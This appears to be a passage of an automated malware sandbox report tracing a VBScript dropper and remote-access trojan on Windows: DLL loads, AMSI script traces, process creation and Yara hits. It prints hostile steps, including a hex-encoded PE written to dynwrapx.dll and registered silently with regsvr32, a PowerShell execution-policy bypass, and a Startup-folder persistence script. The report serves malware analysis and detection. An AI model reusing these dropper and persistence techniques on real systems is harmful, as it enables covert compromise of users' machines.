        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
        Source: C:\Windows\winhlp32.exeSection loaded: winmm.dll
        Source: C:\Windows\winhlp32.exeSection loaded: urlmon.dll
        Source: C:\Windows\winhlp32.exeSection loaded: wininet.dll
        Source: C:\Windows\winhlp32.exeSection loaded: iertutil.dll
        Source: C:\Windows\winhlp32.exeSection loaded: srvcli.dll
        Source: C:\Windows\winhlp32.exeSection loaded: netutils.dll
        Source: C:\Windows\winhlp32.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\winhlp32.exeSection loaded: rstrtmgr.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ncrypt.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ntasn1.dll
        Source: C:\Windows\winhlp32.exeSection loaded: sspicli.dll
        Source: C:\Windows\winhlp32.exeSection loaded: mswsock.dll
        Source: C:\Windows\winhlp32.exeSection loaded: windows.storage.dll
        Source: C:\Windows\winhlp32.exeSection loaded: wldp.dll
        Source: C:\Windows\winhlp32.exeSection loaded: profapi.dll
        Source: C:\Windows\winhlp32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\winhlp32.exeSection loaded: winhttp.dll
        Source: C:\Windows\winhlp32.exeSection loaded: winnsi.dll
        Source: C:\Windows\winhlp32.exeSection loaded: dnsapi.dll
        Source: C:\Windows\winhlp32.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\winhlp32.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
        Source: C:\Windows\winhlp32.exeSection loaded: winmm.dll
        Source: C:\Windows\winhlp32.exeSection loaded: urlmon.dll
        Source: C:\Windows\winhlp32.exeSection loaded: wininet.dll
        Source: C:\Windows\winhlp32.exeSection loaded: iertutil.dll
        Source: C:\Windows\winhlp32.exeSection loaded: srvcli.dll
        Source: C:\Windows\winhlp32.exeSection loaded: netutils.dll
        Source: C:\Windows\winhlp32.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\winhlp32.exeSection loaded: rstrtmgr.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ncrypt.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ntasn1.dll
        Source: C:\Windows\winhlp32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
        Source: C:\Windows\winhlp32.exeSection loaded: winmm.dll
        Source: C:\Windows\winhlp32.exeSection loaded: urlmon.dll
        Source: C:\Windows\winhlp32.exeSection loaded: wininet.dll
        Source: C:\Windows\winhlp32.exeSection loaded: iertutil.dll
        Source: C:\Windows\winhlp32.exeSection loaded: srvcli.dll
        Source: C:\Windows\winhlp32.exeSection loaded: netutils.dll
        Source: C:\Windows\winhlp32.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\winhlp32.exeSection loaded: rstrtmgr.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ncrypt.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ntasn1.dll
        Source: C:\Windows\winhlp32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
        Source: C:\Windows\winhlp32.exeSection loaded: winmm.dll
        Source: C:\Windows\winhlp32.exeSection loaded: urlmon.dll
        Source: C:\Windows\winhlp32.exeSection loaded: wininet.dll
        Source: C:\Windows\winhlp32.exeSection loaded: iertutil.dll
        Source: C:\Windows\winhlp32.exeSection loaded: srvcli.dll
        Source: C:\Windows\winhlp32.exeSection loaded: netutils.dll
        Source: C:\Windows\winhlp32.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\winhlp32.exeSection loaded: rstrtmgr.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ncrypt.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ntasn1.dll
        Source: C:\Windows\winhlp32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: zipfldr.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: windows.fileexplorer.common.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: zipfldr.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.fileexplorer.common.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msxml3.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: Binary string: C:\Users\28718\Documents\GitHub\DcRat\Binaries\Release\Plugins\SendFile.pdb source: RegAsm.exe, 00000004.00000002.3319084811.0000000005F20000.00000004.08000000.00040000.00000000.sdmp

        Data Obfuscation

        Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%windir%");IHost.CreateObject("wscript.shell");ISWbemServicesEx.ExecQuery("SELECT * FROM WIN32_COMPUTERSYSTEM");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IHost.Path();IWshShell3.ExpandEnvironmentStrings("%WINDIR%");IHost.ScriptFullName();IWshShell3.Run("C:\Windows\SYSWOW64\WSCRIPT.EXE //b //e:vbscript "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"")
        Source: C:\Windows\SysWOW64\wscript.exeAnti Malware Scan Interface: CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%windir%");IHost.CreateObject("wscript.shell");ISWbemServicesEx.ExecQuery("SELECT * FROM WIN32_COMPUTERSYSTEM");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IHost.Path();IWshShell3.ExpandEnvironmentStrings("%temp%");IXMLDOMNode._0000003f("<HELLO/>");IXMLDOMNode._00000028();IXMLDOMElement.nodeTypedValue("4D5A6C000100000002000000FFFF00000000000011000000400000000000000057696E33322050726F6772616D210D0A24B409BA0001CD21B44CCD2160000000476F4C696E6B2C20476F41736D207777772E476F446576546F6F6C2E636F6D00504500004C0107003575F8480");IXMLDOMNode._00000028();IXMLDOMElement.dataType("BIN.HEX");IXMLDOMNode._00000028();IXMLDOMElement.nodeTypedValue();IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\dynwrapx.dll");_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\dynwrapx.dll");IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%windir%");IHost.CreateObject("wscript.shell");ISWbemServicesEx.ExecQuery("SELECT * FROM WIN32_COMPUTERSYSTEM");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IHost.Path();IWshShell3.ExpandEnvironmentStrings("%temp%");IXMLDOMNode._0000003f("<HELLO/>");IXMLDOMNode._00000028();IXMLDOMElement.nodeTypedValue("4D5A6C000100000002000000FFFF00000000000011000000400000000000000057696E33322050726F6772616D210D0A24B409BA0001CD21B44CCD2160000000476F4C696E6B2C20476F41736D207777772E476F446576546F6F6C2E636F6D00504500004C0107003575F8480");IXMLDOMNode._00000028();IXMLDOMElement.dataType("BIN.HEX");IXMLDOMNode._00000028();IXMLDOMElement.nodeTypedValue();IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\dynwrapx.dll");_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\dynwrapx.dll");IWshShell3.Run("regsvr32.exe /I 
/S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"", "0", "true");IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%windir%");IHost.CreateObject("wscript.shell");ISWbemServicesEx.ExecQuery("SELECT * FROM WIN32_COMPUTERSYSTEM");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IHost.Path();IWshShell3.ExpandEnvironmentStrings("%temp%");IXMLDOMNode._0000003f("<HELLO/>");IXMLDOMNode._00000028();IXMLDOMElement.nodeTypedValue("4D5A6C000100000002000000FFFF00000000000011000000400000000000000057696E33322050726F6772616D210D0A24B409BA0001CD21B44CCD2160000000476F4C696E6B2C20476F41736D207777772E476F446576546F6F6C2E636F6D00504500004C0107003575F8480");IXMLDOMNode._00000028();IXMLDOMElement.dataType("BIN.HEX");IXMLDOMNode._00000028();IXMLDOMElement.nodeTypedValue();IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\dynwrapx.dll");_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\dynwrapx.dll");IWshShell3.Run("regsvr32.exe /I /S "C:\Users\al
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"'
        Source: C:\Windows\winhlp32.exe Code function: 17_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 17_2_0041CB50
        Source: dynwrapx.dll.2.dr Static PE information: section name: const
        Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe Code function: 2_3_051A9DD9 pushad ; retf 0057h 2_3_051A9DDA
        Source: C:\Windows\SysWOW64\wscript.exe Code function: 2_3_051A9DC1 pushad ; iretd 2_3_051A9DC2

        Persistence and Installation Behavior

        Source: C:\Windows\SysWOW64\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs
        Source: C:\Windows\winhlp32.exe Code function: 17_2_00406EB0 ShellExecuteW,URLDownloadToFileW, 17_2_00406EB0
        Source: C:\Windows\SysWOW64\wscript.exe File created: C:\Users\user\AppData\Local\Temp\dynwrapx.dll

        Boot Survival

        Source: Yara match File source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPE
        Source: Yara match File source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPE
        Source: Yara match File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match File source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPE
        Source: Yara match File source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPE
        Source: Yara match File source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: wscript.exe PID: 5144, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4148, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4068, type: MEMORYSTR
        Source: C:\Windows\SysWOW64\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs
        Source: C:\Windows\winhlp32.exe Code function: 17_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 17_2_0041AA4A
        Source: C:\Windows\winhlp32.exe Code function: 17_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 17_2_0041CB50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\6FA57DE146646C132F6E 54A25BAFF557DB5C79E3CC342368ADFCFD9AB2EA9908343A4F6A6267258007D1
        Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\winhlp32.exe	Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: Yara match	File source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match	File source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPE
        Source: Yara match	File source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPE
        Source: Yara match	File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match	File source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match	File source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match	File source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match	File source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPE
        Source: Yara match	File source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPE
        Source: Yara match	File source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match	File source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match	File source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match	File source: 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match	File source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match	File source: Process Memory Space: wscript.exe PID: 5144, type: MEMORYSTR
        Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4148, type: MEMORYSTR
        Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4068, type: MEMORYSTR
        Source: C:\Windows\winhlp32.exe	Code function: 17_2_0040F7A7 Sleep,ExitProcess,17_2_0040F7A7
        Source: C:\Windows\winhlp32.exe	Code function: 19_2_0040F7A7 Sleep,ExitProcess,19_2_0040F7A7
        Source: C:\Windows\winhlp32.exe	Code function: 21_2_0040F7A7 Sleep,ExitProcess,21_2_0040F7A7
        Source: C:\Windows\winhlp32.exe	Code function: 23_2_0040F7A7 Sleep,ExitProcess,23_2_0040F7A7
        Source: C:\Windows\winhlp32.exe	Code function: 27_2_0040F7A7 Sleep,ExitProcess,27_2_0040F7A7
